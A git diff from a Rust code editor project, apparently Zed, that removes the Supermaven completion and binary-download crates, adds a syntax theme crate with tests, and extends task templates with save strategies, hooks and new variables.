- }; - let Some(line) = line.strip_prefix(MESSAGE_PREFIX) else { - continue; - }; - let Some(message) = serde_json::from_str::(line) - .with_context(|| format!("failed to deserialize line from stdout: {:?}", line)) - .log_err() - else { - continue; - }; - - this.update(cx, |this, _cx| { - if let Supermaven::Spawned(this) = this { - this.handle_message(message); - } - Task::ready(anyhow::Ok(())) - })? - .await?; - } - - Ok(()) - } - - fn handle_message(&mut self, message: SupermavenMessage) { - match message { - SupermavenMessage::ActivationRequest(request) => { - self.account_status = match request.activate_url { - Some(activate_url) => AccountStatus::NeedsActivation { activate_url }, - None => AccountStatus::Ready, - }; - } - SupermavenMessage::ActivationSuccess => { - self.account_status = AccountStatus::Ready; - } - SupermavenMessage::ServiceTier { service_tier } => { - self.account_status = AccountStatus::Ready; - self.service_tier = Some(service_tier); - } - SupermavenMessage::Response(response) => { - let state_id = SupermavenCompletionStateId(response.state_id.parse().unwrap()); - if let Some(state) = self.states.get_mut(&state_id) { - for item in &response.items { - match item { - ResponseItem::Text { text } => state.text.push_str(text), - ResponseItem::Dedent { text } => state.dedent.push_str(text), - _ => {} - } - } - *state.updates_tx.borrow_mut() = (); - } - } - SupermavenMessage::Passthrough { passthrough } => self.handle_message(*passthrough), - _ => { - log::warn!("unhandled message: {:?}", message); - } - } - } -} - -#[derive(Copy, Clone, Debug, Default, Eq, PartialEq, Ord, PartialOrd, Serialize, Deserialize)] -pub struct SupermavenCompletionStateId(usize); - -#[allow(dead_code)] -pub struct SupermavenCompletionState { - buffer_id: EntityId, - prefix_anchor: Anchor, - // prefix_offset is tracked independently because the anchor biases left which - // doesn't allow us to determine if the prior text has been deleted. - prefix_offset: usize, - text: String, - dedent: String, - updates_tx: watch::Sender<()>, -} - -pub struct SupermavenCompletion { - pub id: SupermavenCompletionStateId, - pub updates: watch::Receiver<()>, -} - -#[cfg(test)] -mod tests { - use super::*; - use collections::BTreeMap; - use gpui::TestAppContext; - use language::Buffer; - - #[gpui::test] - async fn test_find_relevant_completion_no_first_letter_skip(cx: &mut TestAppContext) { - let buffer = cx.new(|cx| Buffer::local("hello world", cx)); - let buffer_snapshot = buffer.read_with(cx, |buffer, _| buffer.snapshot()); - - let mut states = BTreeMap::new(); - let state_id = SupermavenCompletionStateId(1); - let (updates_tx, _) = watch::channel(); - - states.insert( - state_id, - SupermavenCompletionState { - buffer_id: buffer.entity_id(), - prefix_anchor: buffer_snapshot.anchor_before(0), // Start of buffer - prefix_offset: 0, - text: "hello".to_string(), - dedent: String::new(), - updates_tx, - }, - ); - - let cursor_position = buffer_snapshot.anchor_after(1); - - let result = find_relevant_completion( - &states, - buffer.entity_id(), - &buffer_snapshot, - cursor_position, - ); - - assert_eq!(result, Some("ello")); - } - - #[gpui::test] - async fn test_find_relevant_completion_with_multiple_chars(cx: &mut TestAppContext) { - let buffer = cx.new(|cx| Buffer::local("hello world", cx)); - let buffer_snapshot = buffer.read_with(cx, |buffer, _| buffer.snapshot()); - - let mut states = BTreeMap::new(); - let state_id = SupermavenCompletionStateId(1); - let (updates_tx, _) = watch::channel(); - - states.insert( - state_id, - SupermavenCompletionState { - buffer_id: buffer.entity_id(), - prefix_anchor: buffer_snapshot.anchor_before(0), // Start of buffer - prefix_offset: 0, - text: "hello".to_string(), - dedent: String::new(), - updates_tx, - }, - ); - - let cursor_position = buffer_snapshot.anchor_after(3); - - let result = find_relevant_completion( - &states, - buffer.entity_id(), - &buffer_snapshot, - cursor_position, - ); - - assert_eq!(result, Some("lo")); - } -} diff --git a/crates/supermaven/src/supermaven_edit_prediction_delegate.rs b/crates/supermaven/src/supermaven_edit_prediction_delegate.rs deleted file mode 100644 index f9eb4a210cff705d609cad3de13924a86253655a..0000000000000000000000000000000000000000 --- a/crates/supermaven/src/supermaven_edit_prediction_delegate.rs +++ /dev/null @@ -1,303 +0,0 @@ -use crate::{Supermaven, SupermavenCompletionStateId}; -use anyhow::Result; -use edit_prediction_types::{ - EditPrediction, EditPredictionDelegate, EditPredictionDiscardReason, EditPredictionIconSet, -}; -use futures::StreamExt as _; -use gpui::{App, Context, Entity, EntityId, Task}; -use language::{Anchor, Buffer, BufferSnapshot}; -use std::{ - ops::{AddAssign, Range}, - path::Path, - sync::Arc, - time::Duration, -}; -use text::{ToOffset, ToPoint}; -use ui::prelude::*; -use unicode_segmentation::UnicodeSegmentation; - -pub const DEBOUNCE_TIMEOUT: Duration = Duration::from_millis(75); - -pub struct SupermavenEditPredictionDelegate { - supermaven: Entity, - buffer_id: Option, - completion_id: Option, - completion_text: Option, - file_extension: Option, - pending_refresh: Option>>, - completion_position: Option, -} - -impl SupermavenEditPredictionDelegate { - pub fn new(supermaven: Entity) -> Self { - Self { - supermaven, - buffer_id: None, - completion_id: None, - completion_text: None, - file_extension: None, - pending_refresh: None, - completion_position: None, - } - } -} - -// Computes the edit prediction from the difference between the completion text. -// This is defined by greedily matching the buffer text against the completion text. -// Inlays are inserted for parts of the completion text that are not present in the buffer text. -// For example, given the completion text "axbyc" and the buffer text "xy", the rendered output in the editor would be "[a]x[b]y[c]". -// The parts in brackets are the inlays. -fn completion_from_diff( - snapshot: BufferSnapshot, - completion_text: &str, - position: Anchor, - delete_range: Range, -) -> EditPrediction { - let buffer_text = snapshot.text_for_range(delete_range).collect::(); - - let mut edits: Vec<(Range, Arc)> = Vec::new(); - - let completion_graphemes: Vec<&str> = completion_text.graphemes(true).collect(); - let buffer_graphemes: Vec<&str> = buffer_text.graphemes(true).collect(); - - let mut offset = position.to_offset(&snapshot); - - let mut i = 0; - let mut j = 0; - while i < completion_graphemes.len() && j < buffer_graphemes.len() { - // find the next instance of the buffer text in the completion text. - let k = completion_graphemes[i..] - .iter() - .position(|c| *c == buffer_graphemes[j]); - match k { - Some(k) => { - if k != 0 { - let offset = snapshot.anchor_after(offset); - // the range from the current position to item is an inlay. - let edit = ( - offset..offset, - completion_graphemes[i..i + k].join("").into(), - ); - edits.push(edit); - } - i += k + 1; - j += 1; - offset.add_assign(buffer_graphemes[j - 1].len()); - } - None => { - // there are no more matching completions, so drop the remaining - // completion text as an inlay. - break; - } - } - } - - if j == buffer_graphemes.len() && i < completion_graphemes.len() { - let offset = snapshot.anchor_after(offset); - // there is leftover completion text, so drop it as an inlay. - let edit_range = offset..offset; - let edit_text = completion_graphemes[i..].join(""); - edits.push((edit_range, edit_text.into())); - } - - EditPrediction::Local { - id: None, - edits, - cursor_position: None, - edit_preview: None, - } -} - -impl EditPredictionDelegate for SupermavenEditPredictionDelegate { - fn name() -> &'static str { - "supermaven" - } - - fn display_name() -> &'static str { - "Supermaven" - } - - fn show_predictions_in_menu() -> bool { - true - } - - fn show_tab_accept_marker() -> bool { - true - } - - fn supports_jump_to_edit() -> bool { - false - } - - fn icons(&self, _cx: &App) -> EditPredictionIconSet { - EditPredictionIconSet::new(IconName::Supermaven) - .with_disabled(IconName::SupermavenDisabled) - .with_error(IconName::SupermavenError) - } - - fn is_enabled(&self, _buffer: &Entity, _cursor_position: Anchor, cx: &App) -> bool { - self.supermaven.read(cx).is_enabled() - } - - fn is_refreshing(&self, _cx: &App) -> bool { - self.pending_refresh.is_some() && self.completion_id.is_none() - } - - fn refresh( - &mut self, - buffer_handle: Entity, - cursor_position: Anchor, - debounce: bool, - cx: &mut Context, - ) { - // Only make new completion requests when debounce is true (i.e., when text is typed) - // When debounce is false (i.e., cursor movement), we should not make new requests - if !debounce { - return; - } - - reset_completion_cache(self, cx); - - let Some(mut completion) = self.supermaven.update(cx, |supermaven, cx| { - supermaven.complete(&buffer_handle, cursor_position, cx) - }) else { - return; - }; - - self.pending_refresh = Some(cx.spawn(async move |this, cx| { - if debounce { - cx.background_executor().timer(DEBOUNCE_TIMEOUT).await; - } - - while let Some(()) = completion.updates.next().await { - this.update(cx, |this, cx| { - // Get the completion text and cache it - if let Some(text) = - this.supermaven - .read(cx) - .completion(&buffer_handle, cursor_position, cx) - { - this.completion_text = Some(text.to_string()); - - this.completion_position = Some(cursor_position); - } - - this.completion_id = Some(completion.id); - this.buffer_id = Some(buffer_handle.entity_id()); - this.file_extension = buffer_handle.read(cx).file().and_then(|file| { - Some( - Path::new(file.file_name(cx)) - .extension()? - .to_str()? - .to_string(), - ) - }); - cx.notify(); - })?; - } - Ok(()) - })); - } - - fn accept(&mut self, _cx: &mut Context) { - reset_completion_cache(self, _cx); - } - - fn discard(&mut self, _reason: EditPredictionDiscardReason, _cx: &mut Context) { - reset_completion_cache(self, _cx); - } - - fn suggest( - &mut self, - buffer: &Entity, - cursor_position: Anchor, - cx: &mut Context, - ) -> Option { - if self.buffer_id != Some(buffer.entity_id()) { - return None; - } - - if self.completion_id.is_none() { - return None; - } - - let completion_text = if let Some(cached_text) = &self.completion_text { - cached_text.as_str() - } else { - let text = self - .supermaven - .read(cx) - .completion(buffer, cursor_position, cx)?; - self.completion_text = Some(text.to_string()); - text - }; - - // Check if the cursor is still at the same position as the completion request - // If we don't have a completion position stored, don't show the completion - if let Some(completion_position) = self.completion_position { - if cursor_position != completion_position { - return None; - } - } else { - return None; - } - - let completion_text = trim_to_end_of_line_unless_leading_newline(completion_text); - - let completion_text = completion_text.trim_end(); - - if !completion_text.trim().is_empty() { - let snapshot = buffer.read(cx).snapshot(); - - // Calculate the range from cursor to end of line correctly - let cursor_point = cursor_position.to_point(&snapshot); - let end_of_line = snapshot.anchor_after(language::Point::new( - cursor_point.row, - snapshot.line_len(cursor_point.row), - )); - let delete_range = cursor_position..end_of_line; - - Some(completion_from_diff( - snapshot, - completion_text, - cursor_position, - delete_range, - )) - } else { - None - } - } -} - -fn reset_completion_cache( - provider: &mut SupermavenEditPredictionDelegate, - _cx: &mut Context, -) { - provider.pending_refresh = None; - provider.completion_id = None; - provider.completion_text = None; - provider.completion_position = None; - provider.buffer_id = None; -} - -fn trim_to_end_of_line_unless_leading_newline(text: &str) -> &str { - if has_leading_newline(text) { - text - } else if let Some(i) = text.find('\n') { - &text[..i] - } else { - text - } -} - -fn has_leading_newline(text: &str) -> bool { - for c in text.chars() { - if c == '\n' { - return true; - } - if !c.is_whitespace() { - return false; - } - } - false -} diff --git a/crates/supermaven_api/src/supermaven_api.rs b/crates/supermaven_api/src/supermaven_api.rs deleted file mode 100644 index 97e70e58a18fc277d8cb17e2fb8fd3c71b884420..0000000000000000000000000000000000000000 --- a/crates/supermaven_api/src/supermaven_api.rs +++ /dev/null @@ -1,125 +0,0 @@ -use anyhow::{Context as _, Result}; -use futures::AsyncReadExt; -use futures::io::BufReader; -use http_client::{AsyncBody, HttpClient, Request as HttpRequest}; -use paths::supermaven_dir; -use serde::Deserialize; -use smol::fs::{self, File}; -use std::path::{Path, PathBuf}; -use std::sync::Arc; - -use util::fs::{make_file_executable, remove_matching}; - -#[derive(Deserialize)] -pub struct SupermavenApiError { - pub message: String, -} - -#[derive(Debug, Deserialize)] -#[serde(rename_all = "camelCase")] -pub struct SupermavenDownloadResponse { - pub download_url: String, - pub version: u64, - pub sha256_hash: String, -} - -pub async fn latest_release( - client: Arc, - platform: &str, - arch: &str, -) -> Result { - let uri = format!( - "https://supermaven.com/api/download-path?platform={}&arch={}", - platform, arch - ); - - // Download is not authenticated - let request = HttpRequest::get(&uri); - - let mut response = client - .send(request.body(AsyncBody::default())?) - .await - .with_context(|| "Unable to acquire Supermaven Agent".to_string())?; - - let mut body = Vec::new(); - response.body_mut().read_to_end(&mut body).await?; - - if response.status().is_client_error() || response.status().is_server_error() { - let body_str = std::str::from_utf8(&body)?; - let error: SupermavenApiError = serde_json::from_str(body_str)?; - anyhow::bail!("Supermaven API error: {}", error.message); - } - - serde_json::from_slice::(&body) - .with_context(|| "Unable to parse Supermaven Agent response".to_string()) -} - -pub fn version_path(version: u64) -> PathBuf { - supermaven_dir().join(format!( - "sm-agent-{}{}", - version, - std::env::consts::EXE_SUFFIX - )) -} - -pub async fn has_version(version_path: &Path) -> bool { - fs::metadata(version_path).await.is_ok_and(|m| m.is_file()) -} - -pub async fn get_supermaven_agent_path(client: Arc) -> Result { - fs::create_dir_all(supermaven_dir()) - .await - .with_context(|| { - format!( - "Could not create Supermaven Agent Directory at {:?}", - supermaven_dir() - ) - })?; - - let platform = match std::env::consts::OS { - "macos" => "darwin", - "windows" => "windows", - "linux" => "linux", - unsupported => anyhow::bail!("unsupported platform {unsupported}"), - }; - - let arch = match std::env::consts::ARCH { - "x86_64" => "amd64", - "aarch64" => "arm64", - unsupported => anyhow::bail!("unsupported architecture {unsupported}"), - }; - - let download_info = latest_release(client.clone(), platform, arch).await?; - - let binary_path = version_path(download_info.version); - - if has_version(&binary_path).await { - // Due to an issue with the Supermaven binary not being made executable on - // earlier Zed versions and Supermaven releases not occurring that frequently, - // we ensure here that the found binary is actually executable. - make_file_executable(&binary_path).await?; - - return Ok(binary_path); - } - - let request = HttpRequest::get(&download_info.download_url); - - let mut response = client - .send(request.body(AsyncBody::default())?) - .await - .with_context(|| "Unable to download Supermaven Agent".to_string())?; - - let mut file = File::create(&binary_path) - .await - .with_context(|| format!("Unable to create file at {:?}", binary_path))?; - - futures::io::copy(BufReader::new(response.body_mut()), &mut file) - .await - .with_context(|| format!("Unable to write binary to file at {:?}", binary_path))?; - - make_file_executable(&binary_path).await?; - - remove_matching(supermaven_dir(), |file| file != binary_path).await; - - Ok(binary_path) -} diff --git a/crates/svg_preview/src/svg_preview_view.rs b/crates/svg_preview/src/svg_preview_view.rs index cc7e2052295f735f06e94f080a60ef25ec4da49d..259243b8ac7cd7d4122fc2f535d490b359442440 100644 --- a/crates/svg_preview/src/svg_preview_view.rs +++ b/crates/svg_preview/src/svg_preview_view.rs @@ -110,7 +110,7 @@ impl SvgPreviewView { let renderer = cx.svg_renderer(); let content = buffer.read(cx).snapshot(); let background_task = cx.background_spawn(async move { - renderer.render_single_frame(content.text().as_bytes(), SCALE_FACTOR, true) + renderer.render_single_frame(content.text().as_bytes(), SCALE_FACTOR) }); self._refresh = cx.spawn_in(window, async move |this, cx| { @@ -182,7 +182,7 @@ impl SvgPreviewView { buffer, window, move |this, _buffer, event: &BufferEvent, window, cx| match event { - BufferEvent::Edited | BufferEvent::Saved => { + BufferEvent::Edited { .. } | BufferEvent::Saved => { this.render_image(window, cx); } _ => {} diff --git a/crates/syntax_theme/Cargo.toml b/crates/syntax_theme/Cargo.toml new file mode 100644 index 0000000000000000000000000000000000000000..18f09c9e316a230abf01d043e3ea4aec11c854ef --- /dev/null +++ b/crates/syntax_theme/Cargo.toml @@ -0,0 +1,26 @@ +[package] +name = "syntax_theme" +version = "0.1.0" +edition.workspace = true +publish.workspace = true +license = "GPL-3.0-or-later" + +[lints] +workspace = true + +[features] +default = [] +test-support = ["gpui/test-support"] +bundled-themes = ["dep:serde", "dep:serde_json"] + +[lib] +path = "src/syntax_theme.rs" +doctest = false + +[dependencies] +gpui.workspace = true +serde = { workspace = true, optional = true } +serde_json = { workspace = true, optional = true } + +[dev-dependencies] +gpui = { workspace = true, features = ["test-support"] } diff --git a/extensions/slash-commands-example/LICENSE-APACHE b/crates/syntax_theme/LICENSE-APACHE similarity index 100% rename from extensions/slash-commands-example/LICENSE-APACHE rename to crates/syntax_theme/LICENSE-APACHE diff --git a/crates/supermaven_api/LICENSE-GPL b/crates/syntax_theme/LICENSE-GPL similarity index 100% rename from crates/supermaven_api/LICENSE-GPL rename to crates/syntax_theme/LICENSE-GPL diff --git a/crates/syntax_theme/src/syntax_theme.rs b/crates/syntax_theme/src/syntax_theme.rs new file mode 100644 index 0000000000000000000000000000000000000000..edd02130b6e2feab6c3291817bde21b64aaddf50 --- /dev/null +++ b/crates/syntax_theme/src/syntax_theme.rs @@ -0,0 +1,336 @@ +#![allow(missing_docs)] + +use std::{ + collections::{BTreeMap, btree_map::Entry}, + sync::Arc, +}; + +use gpui::HighlightStyle; +#[cfg(any(test, feature = "test-support"))] +use gpui::Hsla; + +#[derive(Debug, PartialEq, Eq, Clone, Default)] +pub struct SyntaxTheme { + highlights: Vec, + capture_name_map: BTreeMap, +} + +impl SyntaxTheme { + pub fn new(highlights: impl IntoIterator) -> Self { + let (capture_names, highlights) = highlights.into_iter().unzip(); + + Self { + capture_name_map: Self::create_capture_name_map(capture_names), + highlights, + } + } + + fn create_capture_name_map(highlights: Vec) -> BTreeMap { + highlights + .into_iter() + .enumerate() + .map(|(i, key)| (key, i)) + .collect() + } + + #[cfg(any(test, feature = "test-support"))] + pub fn new_test(colors: impl IntoIterator) -> Self { + Self::new_test_styles(colors.into_iter().map(|(key, color)| { + ( + key, + HighlightStyle { + color: Some(color), + ..Default::default() + }, + ) + })) + } + + #[cfg(any(test, feature = "test-support"))] + pub fn new_test_styles( + colors: impl IntoIterator, + ) -> Self { + Self::new( + colors + .into_iter() + .map(|(key, style)| (key.to_owned(), style)), + ) + } + + pub fn get(&self, highlight_index: impl Into) -> Option<&HighlightStyle> { + self.highlights.get(highlight_index.into()) + } + + pub fn style_for_name(&self, name: &str) -> Option { + self.capture_name_map + .get(name) + .map(|highlight_idx| self.highlights[*highlight_idx]) + } + + pub fn get_capture_name(&self, idx: impl Into) -> Option<&str> { + let idx = idx.into(); + self.capture_name_map + .iter() + .find(|(_, value)| **value == idx) + .map(|(key, _)| key.as_ref()) + } + + pub fn highlight_id(&self, capture_name: &str) -> Option { + self.capture_name_map + .range::(( + capture_name.split(".").next().map_or( + std::ops::Bound::Included(capture_name), + std::ops::Bound::Included, + ), + std::ops::Bound::Included(capture_name), + )) + .rfind(|(prefix, _)| { + capture_name + .strip_prefix(*prefix) + .is_some_and(|remainder| remainder.is_empty() || remainder.starts_with('.')) + }) + .map(|(_, index)| *index as u32) + } + + /// Returns a new [`Arc`] with the given syntax styles merged in. + pub fn merge(base: Arc, user_syntax_styles: Vec<(String, HighlightStyle)>) -> Arc { + if user_syntax_styles.is_empty() { + return base; + } + + let mut base = Arc::try_unwrap(base).unwrap_or_else(|base| (*base).clone()); + + for (name, highlight) in user_syntax_styles { + match base.capture_name_map.entry(name) { + Entry::Occupied(entry) => { + if let Some(existing_highlight) = base.highlights.get_mut(*entry.get()) { + existing_highlight.color = highlight.color.or(existing_highlight.color); + existing_highlight.font_weight = + highlight.font_weight.or(existing_highlight.font_weight); + existing_highlight.font_style = + highlight.font_style.or(existing_highlight.font_style); + existing_highlight.background_color = highlight + .background_color + .or(existing_highlight.background_color); + existing_highlight.underline = + highlight.underline.or(existing_highlight.underline); + existing_highlight.strikethrough = + highlight.strikethrough.or(existing_highlight.strikethrough); + existing_highlight.fade_out = + highlight.fade_out.or(existing_highlight.fade_out); + } + } + Entry::Vacant(vacant) => { + vacant.insert(base.highlights.len()); + base.highlights.push(highlight); + } + } + } + + Arc::new(base) + } +} + +#[cfg(feature = "bundled-themes")] +mod bundled_themes { + use std::collections::BTreeMap; + use std::sync::Arc; + + use gpui::{FontStyle, FontWeight, HighlightStyle, Hsla, Rgba, rgb}; + use serde::Deserialize; + + use super::SyntaxTheme; + + #[derive(Deserialize)] + struct ThemeFile { + themes: Vec, + } + + #[derive(Deserialize)] + struct ThemeEntry { + name: String, + style: ThemeStyle, + } + + #[derive(Deserialize)] + struct ThemeStyle { + syntax: BTreeMap, + } + + #[derive(Deserialize)] + struct SyntaxStyleEntry { + color: Option, + font_weight: Option, + font_style: Option, + } + + impl SyntaxStyleEntry { + fn to_highlight_style(&self) -> HighlightStyle { + HighlightStyle { + color: self.color.as_deref().map(hex_to_hsla), + font_weight: self.font_weight.map(FontWeight), + font_style: self.font_style.as_deref().and_then(|s| match s { + "italic" => Some(FontStyle::Italic), + "normal" => Some(FontStyle::Normal), + "oblique" => Some(FontStyle::Oblique), + _ => None, + }), + ..Default::default() + } + } + } + + fn hex_to_hsla(hex: &str) -> Hsla { + let hex = hex.trim_start_matches('#'); + let rgba: Rgba = match hex.len() { + 6 => rgb(u32::from_str_radix(hex, 16).unwrap_or(0)), + 8 => { + let value = u32::from_str_radix(hex, 16).unwrap_or(0); + Rgba { + r: ((value >> 24) & 0xff) as f32 / 255.0, + g: ((value >> 16) & 0xff) as f32 / 255.0, + b: ((value >> 8) & 0xff) as f32 / 255.0, + a: (value & 0xff) as f32 / 255.0, + } + } + _ => rgb(0), + }; + rgba.into() + } + + fn load_theme(json: &str, theme_name: &str) -> Arc { + let theme_file: ThemeFile = serde_json::from_str(json).expect("failed to parse theme JSON"); + let theme_entry = theme_file + .themes + .iter() + .find(|entry| entry.name == theme_name) + .unwrap_or_else(|| panic!("theme {theme_name:?} not found in theme JSON")); + + let highlights = theme_entry + .style + .syntax + .iter() + .map(|(name, entry)| (name.clone(), entry.to_highlight_style())); + + Arc::new(SyntaxTheme::new(highlights)) + } + + impl SyntaxTheme { + /// Load the "One Dark" syntax theme from the bundled theme JSON. + pub fn one_dark() -> Arc { + load_theme( + include_str!("../../../assets/themes/one/one.json"), + "One Dark", + ) + } + } +} + +#[cfg(test)] +mod tests { + use gpui::FontStyle; + + use super::*; + + #[test] + fn test_syntax_theme_merge() { + // Merging into an empty `SyntaxTheme` keeps all the user-defined styles. + let syntax_theme = SyntaxTheme::merge( + Arc::new(SyntaxTheme::new_test([])), + vec![ + ( + "foo".to_string(), + HighlightStyle { + color: Some(gpui::red()), + ..Default::default() + }, + ), + ( + "foo.bar".to_string(), + HighlightStyle { + color: Some(gpui::green()), + ..Default::default() + }, + ), + ], + ); + assert_eq!( + syntax_theme, + Arc::new(SyntaxTheme::new_test([ + ("foo", gpui::red()), + ("foo.bar", gpui::green()) + ])) + ); + + // Merging empty user-defined styles keeps all the base styles. + let syntax_theme = SyntaxTheme::merge( + Arc::new(SyntaxTheme::new_test([ + ("foo", gpui::blue()), + ("foo.bar", gpui::red()), + ])), + Vec::new(), + ); + assert_eq!( + syntax_theme, + Arc::new(SyntaxTheme::new_test([ + ("foo", gpui::blue()), + ("foo.bar", gpui::red()) + ])) + ); + + let syntax_theme = SyntaxTheme::merge( + Arc::new(SyntaxTheme::new_test([ + ("foo", gpui::red()), + ("foo.bar", gpui::green()), + ])), + vec![( + "foo.bar".to_string(), + HighlightStyle { + color: Some(gpui::yellow()), + ..Default::default() + }, + )], + ); + assert_eq!( + syntax_theme, + Arc::new(SyntaxTheme::new_test([ + ("foo", gpui::red()), + ("foo.bar", gpui::yellow()) + ])) + ); + + let syntax_theme = SyntaxTheme::merge( + Arc::new(SyntaxTheme::new_test([ + ("foo", gpui::red()), + ("foo.bar", gpui::green()), + ])), + vec![( + "foo.bar".to_string(), + HighlightStyle { + font_style: Some(FontStyle::Italic), + ..Default::default() + }, + )], + ); + assert_eq!( + syntax_theme, + Arc::new(SyntaxTheme::new_test_styles([ + ( + "foo", + HighlightStyle { + color: Some(gpui::red()), + ..Default::default() + } + ), + ( + "foo.bar", + HighlightStyle { + color: Some(gpui::green()), + font_style: Some(FontStyle::Italic), + ..Default::default() + } + ) + ])) + ); + } +} diff --git a/crates/tab_switcher/Cargo.toml b/crates/tab_switcher/Cargo.toml index 36e4ba77342796ae5967e81cd34e01b8d41aecf6..8855c8869ab52260be668c45c20e5af7a869433f 100644 --- a/crates/tab_switcher/Cargo.toml +++ b/crates/tab_switcher/Cargo.toml @@ -29,11 +29,10 @@ util.workspace = true workspace.workspace = true [dev-dependencies] -anyhow.workspace = true ctor.workspace = true gpui = { workspace = true, features = ["test-support"] } -language = { workspace = true, features = ["test-support"] } serde_json.workspace = true theme = { workspace = true, features = ["test-support"] } +theme_settings.workspace = true workspace = { workspace = true, features = ["test-support"] } zlog.workspace = true diff --git a/crates/tab_switcher/src/tab_switcher.rs b/crates/tab_switcher/src/tab_switcher.rs index 0fb13c85d21797e4d57728c88fc8bb014a898f78..d1e19ea4faee8d8259d06e2c24875faac7a0117c 100644 --- a/crates/tab_switcher/src/tab_switcher.rs +++ b/crates/tab_switcher/src/tab_switcher.rs @@ -875,7 +875,7 @@ impl PickerDelegate for TabSwitcherDelegate { el.end_slot::(close_button) } else { el.end_slot::(indicator) - .end_hover_slot::(close_button) + .end_slot_on_hover::(close_button) } }), ) diff --git a/crates/tab_switcher/src/tab_switcher_tests.rs b/crates/tab_switcher/src/tab_switcher_tests.rs index e1e3f138252e4dc41aa67d9d5b848eac773d5f4f..4c6cdce17ee32c558c203c51f608e3a654a344cd 100644 --- a/crates/tab_switcher/src/tab_switcher_tests.rs +++ b/crates/tab_switcher/src/tab_switcher_tests.rs @@ -223,8 +223,8 @@ async fn test_close_selected_item(cx: &mut gpui::TestAppContext) { // 1.txt | [3.txt] | 2.txt | 4.txt // // With 3.txt being the active item in the pane. - cx.dispatch_action(ActivatePreviousItem); - cx.dispatch_action(ActivatePreviousItem); + cx.dispatch_action(ActivatePreviousItem::default()); + cx.dispatch_action(ActivatePreviousItem::default()); cx.run_until_parked(); cx.simulate_modifiers_change(Modifiers::control()); @@ -258,7 +258,7 @@ async fn test_close_selected_item(cx: &mut gpui::TestAppContext) { fn init_test(cx: &mut TestAppContext) -> Arc { cx.update(|cx| { let state = AppState::test(cx); - theme::init(theme::LoadThemes::JustBase, cx); + theme_settings::init(theme::LoadThemes::JustBase, cx); super::init(cx); editor::init(cx); state diff --git a/crates/task/src/task.rs b/crates/task/src/task.rs index a8eccc9af1d7f8b00fb8557bb02c05281c5bb2e6..5126d5e89f723f0a9612c2033a789c569111b20a 100644 --- a/crates/task/src/task.rs +++ b/crates/task/src/task.rs @@ -23,8 +23,8 @@ pub use debug_format::{ Request, TcpArgumentsTemplate, ZedDebugConfig, }; pub use task_template::{ - DebugArgsRequest, HideStrategy, RevealStrategy, TaskTemplate, TaskTemplates, - substitute_variables_in_map, substitute_variables_in_str, + DebugArgsRequest, HideStrategy, RevealStrategy, SaveStrategy, TaskHook, TaskTemplate, + TaskTemplates, substitute_variables_in_map, substitute_variables_in_str, }; pub use util::shell::{Shell, ShellKind}; pub use util::shell_builder::ShellBuilder; @@ -75,6 +75,8 @@ pub struct SpawnInTerminal { pub show_command: bool, /// Whether to show the rerun button in the terminal tab. pub show_rerun: bool, + /// Which edited buffers to save before running the task. + pub save: SaveStrategy, } impl SpawnInTerminal { @@ -172,11 +174,17 @@ pub enum VariableName { Column, /// Text from the latest selection. SelectedText, + /// The language of the currently opened buffer (e.g., "Rust", "Python"). + Language, /// The symbol selected by the symbol tagging system, specifically the @run capture in a runnables.scm RunnableSymbol, /// Open a Picker to select a process ID to use in place /// Can only be used to debug configurations PickProcessId, + /// An absolute path of the main (original) git worktree for the current repository. + /// For normal checkouts, this equals the worktree root. For linked worktrees, + /// this is the original repo's working directory. + MainGitWorktree, /// Custom variable, provided by the plugin or other external source. /// Will be printed with `CUSTOM_` prefix to avoid potential conflicts with other variables. Custom(Cow<'static, str>), @@ -209,8 +217,10 @@ impl FromStr for VariableName { "SYMBOL" => Self::Symbol, "RUNNABLE_SYMBOL" => Self::RunnableSymbol, "SELECTED_TEXT" => Self::SelectedText, + "LANGUAGE" => Self::Language, "ROW" => Self::Row, "COLUMN" => Self::Column, + "MAIN_GIT_WORKTREE" => Self::MainGitWorktree, _ => { if let Some(custom_name) = without_prefix.strip_prefix(ZED_CUSTOM_VARIABLE_NAME_PREFIX) @@ -243,8 +253,10 @@ impl std::fmt::Display for VariableName { Self::Row => write!(f, "{ZED_VARIABLE_NAME_PREFIX}ROW"), Self::Column => write!(f, "{ZED_VARIABLE_NAME_PREFIX}COLUMN"), Self::SelectedText => write!(f, "{ZED_VARIABLE_NAME_PREFIX}SELECTED_TEXT"), + Self::Language => write!(f, "{ZED_VARIABLE_NAME_PREFIX}LANGUAGE"), Self::RunnableSymbol => write!(f, "{ZED_VARIABLE_NAME_PREFIX}RUNNABLE_SYMBOL"), Self::PickProcessId => write!(f, "{ZED_VARIABLE_NAME_PREFIX}PICK_PID"), + Self::MainGitWorktree => write!(f, "{ZED_VARIABLE_NAME_PREFIX}MAIN_GIT_WORKTREE"), Self::Custom(s) => write!( f, "{ZED_VARIABLE_NAME_PREFIX}{ZED_CUSTOM_VARIABLE_NAME_PREFIX}{s}" diff --git a/crates/task/src/task_template.rs b/crates/task/src/task_template.rs index 539b2779cc85b5830af90aeb4ffd28596c2c29c3..25fde261f106d57eef94c4d2ef7cad57b3a7ecd0 100644 --- a/crates/task/src/task_template.rs +++ b/crates/task/src/task_template.rs @@ -72,6 +72,12 @@ pub struct TaskTemplate { /// Whether to show the command line in the task output. #[serde(default = "default_true")] pub show_command: bool, + /// Which edited buffers to save before running the task. + #[serde(default)] + pub save: SaveStrategy, + /// Hooks that this task runs when emitted. + #[serde(default)] + pub hooks: HashSet, } #[derive(Deserialize, Eq, PartialEq, Clone, Debug)] @@ -83,6 +89,14 @@ pub enum DebugArgsRequest { Attach(AttachRequest), } +/// What to do with the terminal pane and tab, after the command was started. +#[derive(Clone, Copy, Debug, PartialEq, Hash, Eq, Serialize, Deserialize, JsonSchema)] +#[serde(rename_all = "snake_case")] +pub enum TaskHook { + #[serde(alias = "create_git_worktree")] + CreateWorktree, +} + /// What to do with the terminal pane and tab, after the command was started. #[derive(Default, Clone, Copy, Debug, PartialEq, Eq, Serialize, Deserialize, JsonSchema)] #[serde(rename_all = "snake_case")] @@ -109,11 +123,25 @@ pub enum HideStrategy { OnSuccess, } +/// Which edited buffers to save before running a task. +#[derive(Default, Clone, Copy, Debug, PartialEq, Eq, Serialize, Deserialize, JsonSchema)] +#[serde(rename_all = "snake_case")] +pub enum SaveStrategy { + /// Save all edited buffers. + All, + /// Save the current buffer. + Current, + #[default] + /// Don't save any buffers. + None, +} + /// A group of Tasks defined in a JSON file. #[derive(Clone, Debug, Default, PartialEq, Eq, Serialize, Deserialize, JsonSchema)] pub struct TaskTemplates(pub Vec); impl TaskTemplates { + pub const FILE_NAME: &str = "tasks.json"; /// Generates JSON schema of Tasks JSON template format. pub fn generate_json_schema() -> 